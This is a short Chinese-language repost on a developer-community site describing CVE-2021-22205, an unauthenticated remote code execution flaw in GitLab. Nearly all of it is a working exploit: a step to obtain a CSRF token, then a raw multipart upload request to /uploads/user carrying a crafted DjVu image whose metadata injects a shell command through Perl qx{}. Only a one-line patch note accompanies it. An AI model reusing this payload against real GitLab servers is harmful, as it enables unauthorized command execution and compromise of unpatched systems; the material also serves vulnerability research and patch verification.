Loading [MathJax]/jax/output/CommonHTML/config.js

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

社区首页 >专栏 >CVE-2021-22205 GitLab未授权 RCE

CVE-2021-22205 GitLab未授权 RCE

作者头像

Khan安全团队

发布于 2021-11-05 02:35:18

发布于 2021-11-05 02:35:18

89500

代码可运行

举报

文章被收录于专栏：Khan安全团队Khan安全团队

运行总次数：0

代码可运行

参考： https://hackerone.com/reports/1154542

获取X-CSRF-Token

GET /users/sign_in

RCE

POST /uploads/user
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

AT&TFORM  疍JVMDIRM   .?    F   ?蘅?!葢N?亿堣k鍰,q領觧暯⒚"?FORM   ^DJVUINFO   
   d  INCL   shared_anno.iff BG44    J  婃岜7?*? BG44   鶡BG44   
FORM  DJVIANTa  P(metadata
  (Copyright "\
" . qx{echo vakzz >/tmp/vakzz} . \
" b ") )

修复建议：

GitLab 版本 13.10.3已修复更新

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2021-10-29，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

评论

登录后参与评论

暂无评论

编辑精选文章

换一批

万字详解高可用架构设计

Go 开发者必备：Protocol Buffers 入门指南

10分钟带你彻底搞懂分布式链路跟踪

多租户的 4 种常用方案

亿级月活的社交 APP，陌陌如何做到 3 分钟定位故障？

60页PPT全解：DeepSeek系列论文技术要点整理

Gitlab RCE漏洞复现（CVE-2021-22205）

python http https github

由于 GitLab 某些端点路径无需授权，攻击者可在无需认证的情况下完成图片上传，从而执行任意命令。

R0A1NG

2022/02/19

3.4K0

Gitlab RCE漏洞复现（CVE-2021-22205）

CVE-2024-21683：Confluence远程代码执行漏洞

confluence 函数漏洞容器远程调试

Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件，提供了一个集中化的平台，用于创建、组织和共享团队的文档、知识库、项目计划和协作内容，从而有效地管理项目知识和信息。Confluence 还集成了多种宏和插件，如日程表、任务列表和Jira集成。

Timeline Sec

2024/07/15

8810

CVE-2024-21683：Confluence远程代码执行漏洞

graphql攻击思路

数据结构 graphql 工具客户端数据

可以直接看数据包，更能直观的了解graphql，比如hackerone就是用的graphql

tea9

2023/11/22

3220

QVD-2024-26473：Nacos Derby未授权RCE漏洞

derby nacos 服务漏洞数据库

Nacos 是一个用于动态服务发现和配置以及服务管理的平台，Derby 是一个Java 类库的形式对外提供服务的数据库引擎。

Timeline Sec

2024/11/23

1K0

QVD-2024-26473：Nacos Derby未授权RCE漏洞

GitLab 远程命令执行漏洞复现(CVE-2021-22205)

https 安全 git 容器镜像服务网络安全

GitLab 没有正确验证传递给文件解析器的图像文件，这导致远程命令执行，可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解，漏洞编号CVE-2021-22205。

亿人安全

2022/06/30

7.4K1

GitLab 远程命令执行漏洞复现(CVE-2021-22205)

Joomla未授权创建特权用户漏洞（CVE-2016-8869）分析

安全安全漏洞

Author: p0wd3r (知道创宇404安全实验室) Date: 2016-10-26 0x00 漏洞概述 1.漏洞简介 Joomla是一个自由开源的内容管理系统，近日研究者发现在其3.4.4到3.6.3的版本中存在两个漏洞：CVE-2016-8869，CVE-2016-8870。我们在这里仅分析CVE-2016-8869，利用该漏洞，攻击者可以在网站关闭注册的情况下注册特权用户。Joomla官方已对此漏洞发布升级公告。 2.漏洞影响网站关闭注册的情况下仍可创建特权用户 3.影响版本 3.4.4

Seebug漏洞平台

2018/03/29

1.7K0

Joomla未授权创建特权用户漏洞（CVE-2016-8869）分析

S2-061_RCE_CVE-2020-17530

struts https 网络安全安全腾讯云测试服务

Struts2会对某些标签属性(比如:'id')的属性值进行二次表达式解析，因此当这些标签属性中使用了'%{x}'且'x'的值用户可控时，用户再传入一个'%{payload}'即可造成OGNL表达式执行，S2-061是对S2-059沙盒进行的绕过，S2-059的修复补丁仅修复了沙盒绕过，但是并没有修复OGNL表达式的执行，直到最新版本2.5.26版本中OGNL表达式的执行才得以修复

Al1ex

2021/07/21

6420

S2-061_RCE_CVE-2020-17530

文件上传漏洞另类绕过技巧及挖掘案例全汇总

php shell 安全 html jsp

文件上传漏洞作为获取服务器权限最快的方式，虽然相关资料很多，但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述，然后补充一些除了上传webshell的其他非常规挖掘姿势，包括XSS、重定向、Dos、CSRF等等。

Jayway

2019/09/29

7.3K0

文件上传漏洞另类绕过技巧及挖掘案例全汇总

CMSMS模块Showtime2任意文件上传漏洞CVE-2019-9692分析附利用POC

网站网络安全安全 php shell

CMSMadeSimple是一个简单易于使用的内容管理系统。它使用PHP，MySQL和Smarty模板引擎开发。

用户5878089

2019/07/25

1.1K0

CMSMS模块Showtime2任意文件上传漏洞CVE-2019-9692分析附利用POC

长安“战疫”2022 部分WriteUp （第四名）

编程算法文件存储网络安全安全

本次比赛取得第四名！拿到一个一血，密码方向由NonupleBroken全部解出，2022年首战告捷！

Timeline Sec

2022/02/11

1.2K0

长安“战疫”2022 部分WriteUp （第四名）

渗透测试 | Tomcat渗透

tomcat 网络安全安全 xml jsp

Tomcat服务器是一个免费的开放源代码的web应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP程序的首选。可以这样认为，当在一台机器上配置好 Apache服务器，可利用它响应HTML页面的访问请求。实际上 Tomcat是 Apache服务器的扩展，但运行时它是独立运行的，所以当运行 tomcat时，它实际上作为一个与 Apache独立的进程单独运行的。

FB客服

2021/07/28

5.9K0

渗透测试 | Tomcat渗透

Joomla 3.4.6 RCE复现及分析

php 文件存储命令行工具编程算法缓存

前几天看了下PHP 反序列化字符逃逸学习，有大佬简化了一下joomla3.4.6rce的代码，今天来自己分析学习一下。

Ms08067安全实验室

2020/06/06

3.4K0

VMware vCenter中未经授权的RCE

java php shell 网站 linux

技术大佬在对vSphere Client进行分析的过程中，像往常一样采用了黑盒和白盒两种方法进行测试，重点研究了未经授权即可利用的漏洞。从Web面板，尝试发送尽可能多的不同请求，所有请求都没有Cookie标头。

洛米唯熊

2022/02/28

1.4K0

VMware vCenter中未经授权的RCE

Electron 安全与你我息息相关

进程漏洞渲染 electron 安全

它的应用面如此之广，以至于我们很难忽略它的存在。这篇文章的目的在于介绍当前 Electron 安全发展态势，更关键的是，最近 XZ 后门事件直接导致了供应链安全的担忧，虽然很多应用程序并不一定开源，但是这篇文章会给大家介绍一些通用的切实可行的检测措施，找出 Electron 程序可能存在的 XSS To RCE 和有危害的供应链威胁

意大利的猫

2024/04/15

2K0

Electron 安全与你我息息相关

excel 汉字转拼音「建议收藏」

java https 网络安全

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/151859.html原文链接：https://javaforall.cn

全栈程序员站长

2022/06/24

7.8K0

【笔记】EFCore & SQLite 拼音汉字互换

https java 网络安全数据库 sqlite

注意OnConfiguring方法里的UseSqlite输入的参数需要指定路径，否则容易遭遇惊喜“no such table”。因为sqlite在没有找到db文件的情况下会自动新建同名db文件，新文件为空，当然没有表了，然后它就会告诉你“no such table”。如果不嫌麻烦的话，可以在查询/修改/更新数据库代码前插入context.Database.EnsureCreated()，这样没找到数据库文件的话会抛出异常。

全栈程序员站长

2022/06/24

4.9K0

汉字转拼音文字集

java https 网络安全

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/151850.html原文链接：https://javaforall.cn

全栈程序员站长

2022/06/24

12.3K0

支持二级汉字的 php 汉字助记码生成

https java 网络安全

gbk2312 编码范围共94区, 0-55区为一级汉字, 是按照拼音顺序排列的, 可以按照编码区间确定汉字的拼音, 但是 56 区以后是按笔画顺序排列的, 所以只能用对照表来确定拼音鉴于目前我找不到现成的代码, 固整理了一份, 测试可用.

全栈程序员站长

2022/06/24

4.1K0

相关推荐

Gitlab RCE漏洞复现（CVE-2021-22205）

更多 >

本文部分代码块支持一键运行，欢迎体验

本文部分代码块支持一键运行，欢迎体验